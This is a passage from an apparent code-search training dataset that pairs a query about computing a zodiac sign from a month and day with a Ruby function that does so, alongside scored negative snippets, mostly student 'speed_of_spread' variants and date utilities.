@pitch.schedule.h38 = hours[38]\n @pitch.schedule.h39 = hours[39]\n @pitch.schedule.h40 = hours[40]\n @pitch.schedule.h41 = hours[41]\n @pitch.schedule.h42 = hours[42]\n @pitch.schedule.h43 = hours[43]\n @pitch.schedule.h44 = hours[44]\n @pitch.schedule.h45 = hours[45]\n @pitch.schedule.h46 = hours[46]\n @pitch.schedule.h47 = hours[47]\n\n return hours\n end",
"def ordinal_azimuth; end",
"def phase_one\n\tputs \"\\nPhase One\".colorize(:color => :blue, :background => :white)\n\t eliminated_members = []\n\t 8.times do\n\t \tlosing_tribe = @borneo.immunity_challenge\n\t \t# losing_tribe = @borneo.get_losing_tribe(immune_tribe)\n\t \teliminated_member = losing_tribe.tribal_council()\n\t \t# losing_tribe.members.delete(eliminated_member)\n\t \teliminated_members.push(eliminated_member)\n\t end\n\teliminated_members.length\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n case population_density\n when 200..500\n speed += 0.5\n when 150..200\n speed += 1\n when 100..150\n speed += 1.5\n when 50..100\n speed += 2\n when 0..50\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n speed += case @population_density.floor\n when 0..49\n 2.5\n when 50..99\n 2\n when 100..149\n 1.5\n when 150..199\n 1\n else\n 0.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n\n speed = 0\n\n speed += case\n when @population_density >= 200\n 0.5\n when @population_density >= 150\n 1\n when @population_density >= 100\n 1.5\n when @population_density >= 50\n 2\n else\n 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n case @population_density \n when 200..150\n speed += 0.5\n when 149..100\n speed += 1\n when 99..50\n speed += 1.5\n else \n speed = 2\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def calcula_nova_posicao(heroi, direcao)\n heroi = heroi.dup\n movimentos = {\n \"W\" => [-1, 0],\n \"S\" => [+1, 0],\n \"A\" => [0, -1],\n \"D\" => [0, +1]\n }\n movimento = movimentos[direcao]\n heroi[0] += movimento[0]\n heroi[1] += movimento[1]\n heroi\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n # speed = 0.0\n\n # if @population_density >= 200\n # speed += 0.5\n # elsif @population_density >= 150\n # speed += 1\n # elsif @population_density >= 100\n # speed += 1.5\n # elsif @population_density >= 50\n # speed += 2\n # else\n # speed += 2.5\n # end\n\n #changed speed var name to months\n #changed the months from a discrete range of numbers to a continuous funtion\n #using the equation for a line to get more accurate timeline\n\n # y = speed\n # x = @population_density\n # slope = -1/75\n # b = 2.5\n\n months = @population_density * (-1.0/75) + 2.5\n if months < 0\n months = 0\n end\n\n puts \" and will spread across the state in #{months} months.\\n\\n\"\n\n end",
"def speed_of_spread#in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n\n if @population_density >= 200\n speed = 0.5\n elsif @population_density >= 150\n speed = 1\n elsif @population_density >= 100\n speed = 1.5\n elsif @population_density >= 50\n speed = 2\n else\n speed = 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def zodiacPartners(sign)\n return [(sign+4)%12,(sign+8)%12]\nend",
"def zodiacPartners(sign)\n return [(sign+4)%12,(sign+8)%12]\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 2.5\n\n case @population_density \n when 150..200\n speed += 0.5\n when 100..149\n speed += 1\n when 50..99\n speed += 1.5\n else \n speed \n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end"
] | [
"0.7135922",
"0.6571321",
"0.60677487",
"0.5964015",
"0.5677756",
"0.56502366",
"0.56364274",
"0.55768466",
"0.550457",
"0.546058",
"0.54316163",
"0.54068017",
"0.53350204",
"0.5332118",
"0.5297813",
"0.52955884",
"0.52828133",
"0.52504575",
"0.52006185",
"0.5193434",
"0.51918197",
"0.5191778",
"0.51906675",
"0.51785994",
"0.51739943",
"0.5157118",
"0.5152948",
"0.515202",
"0.5149022",
"0.5142366",
"0.51373583",
"0.51278466",
"0.51267284",
"0.512145",
"0.51112914",
"0.5109776",
"0.5104403",
"0.5101976",
"0.51016784",
"0.50867975",
"0.50806457",
"0.5076257",
"0.50709814",
"0.5066873",
"0.5062742",
"0.5048334",
"0.50386685",
"0.5036816",
"0.5032772",
"0.5028592",
"0.5014982",
"0.501183",
"0.50024366",
"0.49909773",
"0.49802956",
"0.4973311",
"0.4951247",
"0.4947782",
"0.4940625",
"0.4940525",
"0.49371395",
"0.49212813",
"0.49172243",
"0.49030286",
"0.48947304",
"0.48938122",
"0.4885897",
"0.48726007",
"0.48723885",
"0.48723885",
"0.48723885",
"0.48723885",
"0.48711464",
"0.4863277",
"0.48615548",
"0.48612627",
"0.4851907",
"0.4847485",
"0.48467165",
"0.4844845",
"0.4844779",
"0.48417774",
"0.48358777",
"0.483412",
"0.48318237",
"0.48312318",
"0.48311037",
"0.48234314",
"0.48229206",
"0.48189187",
"0.48189187",
"0.48130935",
"0.4810872",
"0.48084563",
"0.48069015",
"0.48049214",
"0.4804682",
"0.48023558",
"0.48023558",
"0.4800948"
] | 0.72937435 | 0 |
Calculates the zodiac sign based on the given month and day: 0 is Aries, 11 is Pisces. Month is 1 if January, and so on. | def zodiac(month,day)
time = [
3,21,4,19, # Aries
4,20,5,20, # Taurus
5,21,6,20, # Gemini
6,21,7,20, # Cancer
7,23,8,22, # Leo
8,23,9,22, # Virgo
9,23,10,22, # Libra
10,23,11,21, # Scorpio
11,22,12,21, # Sagittarius
12,22,1,19, # Capricorn
1,20,2,18, # Aquarius
2,19,3,20 # Pisces
]
for i in 0...12
return i if month==time[i*4] && day>=time[i*4+1]
return i if month==time[i*4+2] && day<=time[i*4+3]
end
return 0
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def zodiac(month,day)\n time=[\n 1,1,1,31, # The Apprentice\n 2,1,2,28, # The Companion\n 3,1,3,31, # The Beacon\n 4,1,4,30, # The Savage\n 5,1,5,31, # The Prodigy\n 6,1,6,30, # The Martyr\n 7,1,7,31, # The Maiden\n 8,1,8,31, # The Gladiator\n 9,1,9,30, # The Voyager\n 10,1,10,31, # The Thief\n 11,1,11,30, # The Glutton\n 12,1,12,31 # The Wishmaker\n ]\n for i in 0...12\n return i if month==time[i*4] && day>=time[i*4+1]\n return i if month==time[i*4+2] && day<=time[i*4+2]\n end\n return 0\nend",
"def zodiacValue(sign)\n return (sign)%12\nend",
"def zodiacOpposite(sign)\n return (sign+6)%12\nend",
"def zodiacOpposite(sign)\n return (sign+6)%12\nend",
"def absolute_day(month, day)\n\n mo = {\n 1 => 31,\n 2 => 28,\n 3 => 31,\n 4 => 30,\n 5 => 31,\n 6 => 30,\n 7 => 31,\n 8 => 31,\n 9 => 30,\n 10 => 31,\n 11 => 30,\n 12 => 31,\n }\n\n # hash v. loop of arrays, computation v. memory tradeoff\n\n total_days = 0\n\n\n (1...month).each do |i| #1...month is (month-1)\n total_days += mo[i]\n end\n\n total_days + day\n\nend",
"def ord(day)\n\nend",
"def ides_of_month(month)\n [MARCH, MAY, JULY, OCTOBER].include?(month) ? 15 : 13\n end",
"def zodiacComplements(sign)\n return [(sign+1)%12,(sign+11)%12]\nend",
"def zodiacComplements(sign)\n return [(sign+1)%12,(sign+11)%12]\nend",
"def monthDays(y, m)\n if ((@@lunar_info[y - 1900] & (0x10000 >> m)) == 0)\n return 29\n else\n return 30\n end\n end",
"def daysinmonth(year, month)\n return (Date.new(year, 12, 31) << (12-month)).day\n end",
"def daysinmonth(year, month)\n return (Date.new(year, 12, 31) << (12-month)).day\n end",
"def julian(year, month, day)\n a = (14 - month) / 12\n y = year + 4800 - a\n m = (12 * a) - 3 + month\n day + (153 * m + 2) / 5 + (365 * y) + y / 4 - y / 100 + y / 400 - 32_045\nend",
"def monthly_dry_days(day)\n month_result_string(day).count('1')\n end",
"def zodiacPartners(sign)\n return [(sign+4)%12,(sign+8)%12]\nend",
"def zodiacPartners(sign)\n return [(sign+4)%12,(sign+8)%12]\nend",
"def days_in_month(month=nil)\n month ||= Date.today.month\n days_in_mon = Date.civil(Date.today.year, month, -1).day\n end",
"def days_in_month(year, month)\n (Date.new(year, 12, 31) << (12-month)).day\n end",
"def days_in_month(year, month)\n Date.new(year, month, -1).day\n end",
"def day_in_month(year, month, day)\n return Date.new(year, month, day).wday\n end",
"def day_of_month\n ordinal = case @time.day\n when 1 then \"st\"\n when 2 then \"nd\"\n when 3 then \"rd\"\n else \"th\"\n end\n \"#{@time.day}#{ordinal}\"\n end",
"def yday\n m = (@month-2 < 0) ? 0 : @month-2\n (@month==1) ? @day : @day + JDaysInMonth[0..m].inject(0) {|sum, n| sum + n }\n end",
"def days_in_month(year, month)\n return (Date.new(year, 12, 31) << (12 - month)).day\n end",
"def days_in_month(month, year = Time.now.year)\n return 29 if month == 2 && Date.gregorian_leap?(year)\n DAYS_IN_MONTH[month]\n end",
"def days_in_month(month, year = Time.now.year)\n return 29 if month == 2 && Date.gregorian_leap?(year)\n DAYS_IN_MONTH[month]\n end",
"def count_of_days_in(month)\n 28 + (month + (month / 8)) % 2 + 2 % month + 2 * (1 / month)\nend",
"def get_days_month(date=nil)\n date ||= @date\n\n return @schedule.days if @schedule.days > 0\n\n if @schedule.days_month != 'specific'\n if @schedule.days_month == 'last' && @schedule.days_month_day == nil\n return 0b0 | (1 << date.at_end_of_month.day)\n end\n end\n\n return 0b0 | (1 << @schedule.start_date.day)\n end",
"def day_of_month\n return self.day_of_year if self.month == 1\n ((self.day_of_year - 1) - DAYS_IN_MONTH.slice(0, (month - 1)).inject(:+)) + 1\n end",
"def days_in_month(month, year = Time.now.year)\n\t return 29 if month == 2 && Date.gregorian_leap?(year)\n\t return COMMON_YEAR_DAYS_IN_MONTH[month]\n\tend",
"def find_day_of_month(day=@day, first_day_of_month=@first_day_of_month)\r\n day = ((day - 1) + first_day_of_month) % 7\r\n return 7 if day == 0\r\n day\r\n end",
"def daySymbol\n dayNum = 30*(@month - 1) + (@day - 1)\n symbols = [\"Raisin (Grape)\",\n \"Safran (Saffron)\",\n \"Châtaigne (Chestnut)\",\n \"Colchique (Crocus)\",\n \"Cheval (Horse)\",\n \"Balsamine (Impatiens)\",\n \"Carotte (Carrot)\",\n \"Amarante (Amaranth)\",\n \"Panais (Parsnip)\",\n \"Cuve (Vat)\",\n \"Pomme de terre (Potato)\",\n \"Immortelle (Strawflower)\",\n \"Potiron (Calabaza)\",\n \"Réséda (Mignonette)\",\n \"Âne (Donkey)\",\n \"Belle de nuit (The four o’clock flower)\",\n \"Citrouille (Pumpkin)\",\n \"Sarrasin (Buckwheat)\",\n \"Tournesol (Sunflower)\",\n \"Pressoir (Wine-Press)\",\n \"Chanvre (Hemp)\",\n \"Pêche (Peach)\",\n \"Navet (Turnip)\",\n \"Amaryllis (Amaryllis)\",\n \"Bœuf (Cow)\",\n \"Aubergine (Eggplant)\",\n \"Piment (Chili Pepper)\",\n \"Tomate (Tomato)\",\n \"Orge (Barley)\",\n \"Tonneau (Barrel)\",\n \"Pomme (Apple)\",\n \"Céleri (Celery)\",\n \"Poire (Pear)\",\n \"Betterave (Beet root)\",\n \"Oie (Goose)\",\n \"Héliotrope (Heliotrope)\",\n \"Figue (Fig)\",\n \"Scorsonère (Black Salsify)\",\n \"Alisier (Chequer Tree)\",\n \"Charrue (Plough)\",\n \"Salsifis (Salsify)\",\n \"Macre (Water chestnut)\",\n \"Topinambour (Jerusalem Artichoke)\",\n \"Endive (Endive)\",\n \"Dindon (Turkey)\",\n \"Chervis (Skirret)\",\n \"Cresson (Watercress)\",\n \"Dentelaire (Leadworts)\",\n \"Grenade (Pomegranate)\",\n \"Herse (Harrow)\",\n \"Bacchante (Asarum baccharis)\",\n \"Azerole (Acerola)\",\n \"Garance (Madder)\",\n \"Orange (Orange)\",\n \"Faisan (Pheasant)\",\n \"Pistache (Pistachio)\",\n \"Macjonc (Tuberous pea)\",\n \"Coing (Quince)\",\n \"Cormier (Service tree)\",\n \"Rouleau (Roller)\",\n \"Raiponce (Rampion)\",\n \"Turneps (Turnip)\",\n \"Chicorée (Chicory)\",\n \"Nèfle (Medlar)\",\n \"Cochon (Pig)\",\n \"Mâche (Corn Salad)\",\n \"Chou-fleur (Cauliflower)\",\n \"Miel (Honey)\",\n \"Genièvre (Juniper)\",\n \"Pioche (Pickaxe)\",\n \"Cire (Wax)\",\n \"Raifort (Horseradish)\",\n \"Cèdre (Cedar tree)\",\n \"Sapin (Fir tree)\",\n \"Chevreuil (Roe Deer)\",\n \"Ajonc (Gorse)\",\n \"Cyprès (Cypress Tree)\",\n \"Lierre (Ivy)\",\n \"Sabine (Juniper)\",\n \"Hoyau (Grub-hoe)\",\n \"Érable sucré (Maple Tree)\",\n \"Bruyère (Heather)\",\n \"Roseau (Reed plant)\",\n \"Oseille (Sorrel)\",\n \"Grillon (Cricket)\",\n \"Pignon (Pinenut)\",\n \"Liège (cork)\",\n \"Truffe (Truffle)\",\n \"Olive (Olive)\",\n \"Pelle (shovel)\",\n \"Tourbe (Peat)\",\n \"Houille (Coal)\",\n \"Bitume (Bitumen)\",\n \"Soufre (Sulphur)\",\n \"Chien (Dog)\",\n \"Lave (Lava)\",\n \"Terre végétale (Topsoil)\",\n \"Fumier (Manure)\",\n \"Salpêtre (Saltpeter)\",\n \"Fléau (Flail)\",\n \"Granit (Granite stone)\",\n \"Argile (Clay)\",\n \"Ardoise (Slate)\",\n \"Grès (Sandstone)\",\n \"Lapin (Rabbit)\",\n \"Silex (Flint)\",\n \"Marne (Marl)\",\n \"Pierre à chaux (Limestone)\",\n \"Marbre (Marble)\",\n \"Van (Winnowing basket)\",\n \"Pierre à plâtre (Gypsum)\",\n \"Sel (Salt)\",\n \"Fer (Iron)\",\n \"Cuivre (Copper)\",\n \"Chat (Cat)\",\n \"Étain (Tin)\",\n \"Plomb (Lead)\",\n \"Zinc (Zinc)\",\n \"Mercure (Mercury (metal))\",\n \"Crible (Sieve)\",\n \"Lauréole (Spurge-laurel)\",\n \"Mousse (Moss)\",\n \"Fragon (Butcher’s Broom)\",\n \"Perce-neige (Snowdrop)\",\n \"Taureau (Bull)\",\n \"Laurier-thym (Laurustinus)\",\n \"Amadouvier (Tinder polypore)\",\n \"Mézéréon (Daphne mezereum)\",\n \"Peuplier (Poplar Tree)\",\n \"Coignée (Axe)\",\n \"Ellébore (Hellebore)\",\n \"Brocoli (Broccoli)\",\n \"Laurier (Laurel)\",\n \"Avelinier (Cob or filbert)\",\n \"Vache (Cow)\",\n \"Buis (Box Tree)\",\n \"Lichen (Lichen)\",\n \"If (Yew tree)\",\n \"Pulmonaire (Lungwort)\",\n \"Serpette (Billhook)\",\n \"Thlaspi (Pennycress)\",\n \"Thimelé (Rose Daphne)\",\n \"Chiendent (Couch Grass)\",\n \"Trainasse (Knotweed)\",\n \"Lièvre (Hare)\",\n \"Guède (Woad)\",\n \"Noisetier (Hazel)\",\n \"Cyclamen (Cyclamen)\",\n \"Chélidoine (Celandine)\",\n \"Traîneau (Sleigh)\",\n \"Tussilage (Coltsfoot)\",\n \"Cornouiller (Dogwood)\",\n \"Violier (Matthiola)\",\n \"Troène (Privet)\",\n \"Bouc (Billygoat)\",\n \"Asaret (Wild Ginger)\",\n \"Alaterne (Buckthorn)\",\n \"Violette (Violet (plant))\",\n \"Marceau (Goat Willow)\",\n \"Bêche (Spade)\",\n \"Narcisse (Narcissus)\",\n \"Orme (Elm Tree)\",\n \"Fumeterre (Common fumitory)\",\n \"Vélar (Hedge Mustard)\",\n \"Chèvre (Goat)\",\n \"Épinard (Spinach)\",\n \"Doronic (Large-flowered Leopard’s Bane)\",\n \"Mouron (Pimpernel)\",\n \"Cerfeuil (Chervil)\",\n \"Cordeau (Twine)\",\n \"Mandragore (Mandrake)\",\n \"Persil (Parsley)\",\n \"Cochléaria (Scurvy-grass)\",\n \"Pâquerette (Daisy)\",\n \"Thon (Tuna)\",\n \"Pissenlit (Dandelion)\",\n \"Sylve (Forest)\",\n \"Capillaire (Maidenhair fern)\",\n \"Frêne (Ash Tree)\",\n \"Plantoir (Dibber: a hand gardening tool)\",\n \"Primevère (Primrose)\",\n \"Platane (Plane Tree)\",\n \"Asperge (Asparagus)\",\n \"Tulipe (Tulip)\",\n \"Poule (Hen)\",\n \"Bette (Chard Plant)\",\n \"Bouleau (Birch Tree)\",\n \"Jonquille (Daffodil)\",\n \"Aulne (Alder)\",\n \"Couvoir (Hatchery)\",\n \"Pervenche (Periwinkle)\",\n \"Charme (Ironwood)\",\n \"Morille (Morel)\",\n \"Hêtre (Beech Tree)\",\n \"Abeille (Bee)\",\n \"Laitue (Lettuce)\",\n \"Mélèze (Larch)\",\n \"Ciguë (Hemlock)\",\n \"Radis (Radish)\",\n \"Ruche (Hive)\",\n \"Gainier (Judas tree)\",\n \"Romaine (Lettuce)\",\n \"Marronnier (Chestnut Oak)\",\n \"Roquette (Arugula or Rocket)\",\n \"Pigeon (Pigeon)\",\n \"Lilas (Lilac)\",\n \"Anémone (Anemone)\",\n \"Pensée (Pansy)\",\n \"Myrtille (Blueberry)\",\n \"Greffoir (Knife)\",\n \"Rose (Rose)\",\n \"Chêne (Oak Tree)\",\n \"Fougère (Fern)\",\n \"Aubépine (Hawthorn)\",\n \"Rossignol (Nightingale)\",\n \"Ancolie (Columbine)\",\n \"Muguet (Lily of the Valley)\",\n \"Champignon (Button mushroom)\",\n \"Hyacinthe (Hyacinth)\",\n \"Râteau (Rake)\",\n \"Rhubarbe (Rhubarb)\",\n \"Sainfoin (Sainfoin)\",\n \"Bâton-d’or (Wallflower)\",\n \"Chamérops (Palm tree)\",\n \"Ver à soie (Silkworm)\",\n \"Consoude (Comfrey)\",\n \"Pimprenelle (Salad Burnet)\",\n \"Corbeille d’or (Basket of Gold)\",\n \"Arroche (Orache)\",\n \"Sarcloir (Garden hoe)\",\n \"Statice (Sea Lavender)\",\n \"Fritillaire (Fritillary)\",\n \"Bourrache (Borage)\",\n \"Valériane (Valerian)\",\n \"Carpe (Carp)\",\n \"Fusain (Spindle (shrub))\",\n \"Civette (Chive)\",\n \"Buglosse (Bugloss)\",\n \"Sénevé (Wild mustard)\",\n \"Houlette (Shepherd’s crook)\",\n \"Luzerne (Alfalfa)\",\n \"Hémérocalle (Daylily)\",\n \"Trèfle (Clover)\",\n \"Angélique (Angelica)\",\n \"Canard (Duck)\",\n \"Mélisse (Lemon Balm)\",\n \"Fromental (Oat grass)\",\n \"Martagon (Martagon lily)\",\n \"Serpolet (Thyme plant)\",\n \"Faux (Scythe)\",\n \"Fraise (Strawberry)\",\n \"Bétoine (Woundwort)\",\n \"Pois (Pea)\",\n \"Acacia (Acacia)\",\n \"Caille (Quail)\",\n \"Œillet (Carnation)\",\n \"Sureau (Elderberry)\",\n \"Pavot (Poppy plant)\",\n \"Tilleul (Linden or Lime tree)\",\n \"Fourche (Pitchfork)\",\n \"Barbeau (Cornflower)\",\n \"Camomille (Camomile)\",\n \"Chèvrefeuille (Honeysuckle)\",\n \"caille-lait (Bedstraw)\",\n \"Tanche (Tench)\",\n \"Jasmin (Jasmine Plant)\",\n \"Verveine (Verbena)\",\n \"Thym (Thyme Plant)\",\n \"Pivoine (Peony Plant)\",\n \"Chariot (Hand Cart)\",\n \"Seigle (Rye)\",\n \"Avoine (Oats)\",\n \"Oignon (Onion)\",\n \"Véronique (Speedwell)\",\n \"Mulet (Mule)\",\n \"Romarin (Rosemary)\",\n \"Concombre (Cucumber)\",\n \"Échalote (Shallot)\",\n \"Absinthe (Wormwood)\",\n \"Faucille (Sickle)\",\n \"Coriandre (Coriander)\",\n \"Artichaut (Artichoke)\",\n \"Girofle (Clove)\",\n \"Lavande (Lavender)\",\n \"Chamois (Chamois)\",\n \"Tabac (Tobacco)\",\n \"Groseille (Currant)\",\n \"Gesse (Hairy Vetchling)\",\n \"Cerise (Cherry)\",\n \"Parc (Park)\",\n \"Menthe (Mint)\",\n \"Cumin (Cumin)\",\n \"Haricot (Bean)\",\n \"Orcanète (Alkanet)\",\n \"Pintade (Guinea fowl)\",\n \"Sauge (Sage Plant)\",\n \"Ail (Garlic)\",\n \"Vesce (Tare)\",\n \"Blé (Wheat)\",\n \"Chalémie (Shawm)\",\n \"Épeautre (Einkorn Wheat)\",\n \"Bouillon blanc (Common Mullein)\",\n \"Melon (Honeydew Melon)\",\n \"Ivraie (Ryegrass)\",\n \"Bélier (Ram)\",\n \"Prêle (Horsetail)\",\n \"Armoise (Mugwort)\",\n \"Carthame (Safflower)\",\n \"Mûre (Blackberry)\",\n \"Arrosoir (Watering Can)\",\n \"Panis (Panic grass)\",\n \"Salicorne (Common Glasswort)\",\n \"Abricot (Apricot)\",\n \"Basilic (Basil)\",\n \"Brebis (Ewe)\",\n \"Guimauve (Marshmallow root)\",\n \"Lin (Flax)\",\n \"Amande (Almond)\",\n \"Gentiane (Gentian)\",\n \"Écluse (Lock)\",\n \"Carline (Carline thistle)\",\n \"Câprier (Caper)\",\n \"Lentille (Lentil)\",\n \"Aunée (Yellow starwort)\",\n \"Loutre (Otter)\",\n \"Myrte (Myrtle)\",\n \"Colza (Rapeseed)\",\n \"Lupin (Lupin)\",\n \"Coton (Cotton)\",\n \"Moulin (Mill)\",\n \"Prune (Plum)\",\n \"Millet (Millet)\",\n \"Lycoperdon (Puffball)\",\n \"Escourgeon (Six-row Barley)\",\n \"Saumon (Salmon)\",\n \"Tubéreuse (Tuberose)\",\n \"Sucrion (Sugar melon)\",\n \"Apocyn (Apocynum)\",\n \"Réglisse (Liquorice)\",\n \"Échelle (Ladder)\",\n \"Pastèque (Watermelon)\",\n \"Fenouil (Fennel)\",\n \"Épine vinette (Barberry)\",\n \"Noix (Walnut)\",\n \"Truite (Trout)\",\n \"Citron (Lemon)\",\n \"Cardère (Teasel)\",\n \"Nerprun (Buckthorn)\",\n \"Tagette (Mexican Marigold)\",\n \"Hotte (Sack)\",\n \"Églantine (Wild Rose)\",\n \"Noisette (Hazelnut)\",\n \"Houblon (Hops)\",\n \"Sorgho (Sorghum)\",\n \"Écrevisse (Crayfish)\",\n \"Bigarade (Bitter Orange)\",\n \"Verge d’or (Goldenrod)\",\n \"Maïs (Maize or Corn)\",\n \"Marron (Chestnut)\",\n \"Panier (Basket)\",\n \"La Fête de la Vertu (Celebration of Virtue)\",\n \"La Fête du Génie (Celebration of Talent)\",\n \"La Fête du Travail (Celebration of Labour)\",\n \"La Fête de l'Opinion (Celebration of Principles)\",\n \"La Fête des Récompenses (Celebration of Honours)\",\n \"La Fête de la Révolution (Celebration of the Revolution)\"]\n return symbols[dayNum]\n end",
"def days_in_month(month, year = current.year)\n if month == 2 && ::Date.gregorian_leap?(year)\n 29\n else\n COMMON_YEAR_DAYS_IN_MONTH[month]\n end\n end",
"def nones_of_month(month)\n ides_of_month(month) - 8\n end",
"def dec_Sun() \r\n asin( sin(Celes.nut06a(@ajd, 0)[ 1 ] + Celes.obl06(@ajd, 0)) * \r\n sin( al(@ma, @ta, Celes.faom03(@ta)))) \r\n end",
"def atomize_ordinal(year, day, separator, sign)\n date = parse([year, day].join('-'))\n sign = \"#{sign}1\".to_i\n @separator = separator\n\n [sign * date.year, date.month, date.day]\n end",
"def month_result_string(day)\n start = day.beginning_of_month.yday - 1\n finish = day.end_of_month.yday - 1\n result_string(day.year).slice(start..finish)\n end",
"def days_in_month(month, year)\n (month == 2 && is_leap_year?(year)) ? 29 : DAYS_IN_A_MONTH[month]\n end",
"def inspect\n \"the day of the month is the \" +\n ordinal_list(@days)\n end",
"def month() end",
"def roman_month(date)\n date[1]\n end",
"def date_parse raw_day, raw_month\n str_month = raw_month.scan(@regex_monthes)[0]\n month = @monthes[str_month]\n return if not month\n day = raw_day.to_i\n return if day==0\n today = Date.today\n if day < today.day and month == 12\n year = today.year + 1\n else\n year = today.year\n end\n #puts year, year.class, month, month.class, day, day.class\n return \"#{year}-#{\"%02d\"%month}-#{\"%02d\"%day}\"\nend",
"def days_in_month\n raw = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31][self.month]\n self.month == 2 && leap_year? ? raw + 1 : raw\n end",
"def nwday_of_month(n)\n self + (nwday_day(n) - day).days\n end",
"def add_days(year, month, day , offest )\n\n\n\t### From Hijri to Julian to Gregorian date \n\n\tgd = fromjdtog(islamictojd(year.to_i, month.to_i, day.to_i))\n\n\t### Add months to Gregorian date \n\n\tparsed_date = Date.new( gd[0] , gd[1] , gd[2]) \n\n\tgd_after_add = parsed_date + offest\n\n\tgd_after_add = gd_after_add.to_s(:db)\n\n\t### From Gregorian to Julian to Hijri date \t\n\n\thd_after_add = fromjdtoislamic(gtojd(gd_after_add[0,4].to_i,gd_after_add[5,2].to_i,gd_after_add[8,2].to_i))\n\n\t## Return Hijri date \n\n\t#return year.to_s + '-' + month.to_s + '-' + day.to_s + ' بعد اضافة ' + offest.to_s + ' شهر ' + hd_after_add.to_s\n\n\treturn hd_after_add\n\nend",
"def julian_to_merch(month)\n date_calc.julian_to_merch(month)\n end",
"def mday() end",
"def dob_mapping(month, day, year)\n month_arr = %w(January February March April May June July August September October November December)\n m_str = ((month_arr.index month) + 1).to_s\n m = (m_str.length > 1) ? m_str : '0' + m_str\n d = (day.length > 1) ? day : '0' + day\n y = year\n\n y + '-' + m + '-' + d\n end",
"def user_input_to_zodiac(input)\n zodiac_sign = ''\n dates = []\n Zodiac.all_dates.each do |date_array|\n if Date.parse(input).between?(Date.parse(date_array[0]), Date.parse(date_array[1]))\n dates = date_array\n end\n end\n Zodiac.all.each do |zodiac|\n if zodiac.sun_dates == dates\n @zodiac = zodiac\n elsif Date.parse(input).between?(Date.parse(\"12/22\"), Date.parse(\"12/31\")) || Date.parse(input).between?(Date.parse(\"01/01\"), Date.parse(\"01/19\"))\n @zodiac = Zodiac.all.find{|zodiac| zodiac.name == \"Capricorn\"}\n end\n end\n @zodiac\n end",
"def days_in_month\n Time.send(\"month_days\", self.year, self.month)\n end",
"def day_number_of_the_year day, month, hash \n if month > 1\n for i in 1...month\n day += hash[i]\n end\n end\n day\nend",
"def day_of_month(*days)\n merge(mday: days)\n end",
"def ma_Sun()\r\n @ta = ( @ajd - DJ00 ) / DJC \r\n# @ma = delta_equinox()[2]\r\n @ma = Celes.falp03(@ta) \r\n end",
"def merch_to_julian(month)\n date_calc.merch_to_julian(month)\n end",
"def gregorian2absolute(day, month, year)\n # # Computes the absolute date from the Gregorian date.\n @d = day\n @m = month - 1\n @m.downto(1) do |m|\n @d += last_day_of_gregorian_month(@m, year)\n end\n return (@d + 365 * (year - 1) + (year -1) / 4.0 - (year - 1) / 100.0 + (year - 1) / 400.0).to_i\n end",
"def month\n @month ||= date_calc.merch_to_julian(merch_month)\n end",
"def lunar_date(year, month, day)\n l = yang_to_nong(year, month, day)\n l[0].to_s + '-' + l[1].to_s + '-' + (/^\\d+/.match(l[2].to_s)).to_s\n end",
"def first_day(month)\n m = set_month(month)\n q = 1\n y = set_year(month)\n h = (q + (((m+1) * 26)/10) + y + (y/4) + (6 * (y/100)) + (y/400)) % 7\n end",
"def days_in_month(month, year)\n days_per_month = { 1 => 31, 2 => 28 + (leap?(year) ? 1 : 0), 3 => 31, 4 => 30, 5 => 31, 6 => 30, 7 => 31, 8 => 31, 9 => 30, 10 => 31, 11 => 30, 12 => 31 } \n if (month == 0)\n return days_per_month[12]\n elsif (month < 0)\n return days_per_month[month % 13]\n else\n return days_per_month[month] \n end\n end",
"def nights_left_in_a_month(day,month,year)\n\n nights_left = days_in_month(month,year) - day \n return nights_left\n\nend",
"def day(date)\n [date.day.ordinalize.to_s, month(date)].join(' ')\n end",
"def fromjdtoislamic(jd)\n\n\tjd = (jd).floor + 0.5\n\n\tyear = ((30 * (jd - $jdepoch) + 10646) / 10631).floor\n\n\t#year = (year <= 0 ? year - 1 : year)\n\n\tif ( year < 0 )\n\n\t\tyear = -1\n\n\tend\n\n\tmonth = [12, ((jd - 29 - islamictojd(year, 1, 1)) / 29.5).ceil + 1].min\n\n\tday = (jd - islamictojd(year, month, 1) + 1).to_i\n\n\treturn year, month, day\n\nend",
